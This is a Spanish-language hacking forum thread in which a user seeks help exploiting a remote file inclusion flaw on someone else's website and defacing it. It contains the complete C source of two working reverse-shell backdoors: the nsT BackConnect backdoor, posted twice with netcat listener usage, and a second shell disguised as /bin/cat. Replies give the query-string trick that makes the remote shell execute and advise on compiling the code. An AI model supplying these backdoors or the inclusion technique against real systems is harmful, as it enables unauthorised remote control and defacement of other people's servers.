Buenas, hacia tiempo que no me pasaba por aquí, pero ya que estoy, me gustaria saber, porqué mi server, al ejecutar la shell en .txt solo me muestra lo que hay dentro del txt. Es decir yo estoy en la pagina vulnerable:
www.paginavul.com/index.php?pagina=http://miserver.com/shell.txt
Y cuando hago eso me muestra el codigo de la shell, no la shell en si. Si la guardo con formato de imagen, me dice que no se puede mostrar porqué está dañada, y no hace su efecto.
Gracias por adelantado,
SN4K3
PD: Si algun mod lee esto, si puede que me canvie el nombre a Zander.
Quizas no es vulnerable? Como sabes que en verdad es vulnerable?
Wow! Gracias por eso, vi un php que mostraba los archivos externos... pero no dejaba de ser un iframe :P
Y ahora, hay alguna manera de hacer un RFI a través de un iframe?
te falto esto:
www.paginavul.com/index.php?pagina=http://miserver.com/shell.txt?
el signo de interrogacion para que ejecutara la shell remota, sin el signo de interrogacion al final , la shell remota no se ejecutara... espero que te haya servido esta informacion , bye
La verdad que si, muchisimas gracias!
EDIT: Alguien podria compilar este backdoor de conexion inversa? O si ya lo tienen mejor, es el BackConnect. Saludos!
Nota del moderador: Si no sabes compilar 40 lineas de código en C mejor dedícate a otra cosa.
Aquí el code:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
* client: nc -lp 9999
* server: ./backconnect <ip_client> 9999
*********************************
*/
#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>
int main (int argc, char **argv) {
struct sockaddr_in sock;
int sd;
char command[256];
if (argc < 3) {
printf("%s <host> <port>\n", argv[0]);
return 1;
}
close(1);
if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror(argv[0]);
return 1;
}
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(atoi(argv[2]));
inet_aton(argv[1], &sock.sin_addr);
if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
perror(argv[0]);
return 1;
}
close(2);
dup(sd);
bzero(command, 256);
while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
system(command);
bzero(command, 256);
}
close(sd);
return 0;
}
Porque no se porque me da errores de que algunas librerias no las encuentra.
buen backdoor ;D ;D
aki otro code +
/* Writed by Rozor !Sub_Level */
/* irc-hispano.org #sub_level ( xZR ) */
/* http://sincontrol.tomahost.org */
/* on C/C++ for Linux*/
/* gcc XZrshell.c -o XZrshell */
/* Name ID = /bin/cat */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
int main()
{
int sck;
struct sockaddr_in rhost;
char *IP = "127.0.0.1"; /* Direccion ip */
unsigned short PORT = 666; /* Puerto */
rhost.sin_family = AF_INET;
rhost.sin_port = htons(PORT);
rhost.sin_addr.s_addr = inet_addr("127.0.0.1");
memset(&(rhost.sin_zero), '\0', 8);
sck = socket(AF_INET, SOCK_STREAM, 0);
connect(sck, (struct sockaddr *)&rhost, sizeof(rhost));
if(!fork())
{
setsid();
dup2(sck, 0);
dup2(sck, 1);
dup2(sck, 2);
dup2(sck, 3);
dup2(sck, 4);
dup2(sck, 5);
execl("/bin/bash", "/bin/cat", NULL);
close(sck);
}
}
es bastante sencillo pero practiko tambien
bytes
no te debiera de dar problemas...has buscado si tienes esas librerias??
si es así al compilar incluyelas en la ruta con : -L <ruta>
si no las tienes, bájatelas y colócalas en las rutas por defecto: /lib o /usr/lib
si, es raro, deberia funcionar, lo unico es que lo estes compilando en windows, las sys/ no te las reconoceria, esas son para linux, en caso de ser asi, usa linux o cygwin :)
Cita de: Hacker-SN4K3 en 1 Abril 2007, 12:21 PM
La verdad que si, muchisimas gracias!
EDIT: Alguien podria compilar este backdoor de conexion inversa? O si ya lo tienen mejor, es el BackConnect. Saludos!
Nota del moderador: Si no sabes compilar 40 lineas de código en C mejor dedícate a otra cosa.
Aquí el code:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
* client: nc -lp 9999
* server: ./backconnect <ip_client> 9999
*********************************
*/
#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>
int main (int argc, char **argv) {
struct sockaddr_in sock;
int sd;
char command[256];
if (argc < 3) {
printf("%s <host> <port>\n", argv[0]);
return 1;
}
close(1);
if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror(argv[0]);
return 1;
}
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(atoi(argv[2]));
inet_aton(argv[1], &sock.sin_addr);
if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
perror(argv[0]);
return 1;
}
close(2);
dup(sd);
bzero(command, 256);
while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
system(command);
bzero(command, 256);
}
close(sd);
return 0;
}
Mira "moderador" yo no se de que conyo vas, pero seguro que tu no naciste defaceando una web, sino que lo aprendistes, y por algo se empieza, así que te tranquilizas OK?
seguro que no defacea ni sabiendo. Olvidate del defacing.
PD: como dijo el mod... si no sabes compilar esto... dejalo.
PD2: www.google.com, sección de bugs y exploits, sección de C/C++, boton "buscar". esta pregunta se ha respondido infinitas veces.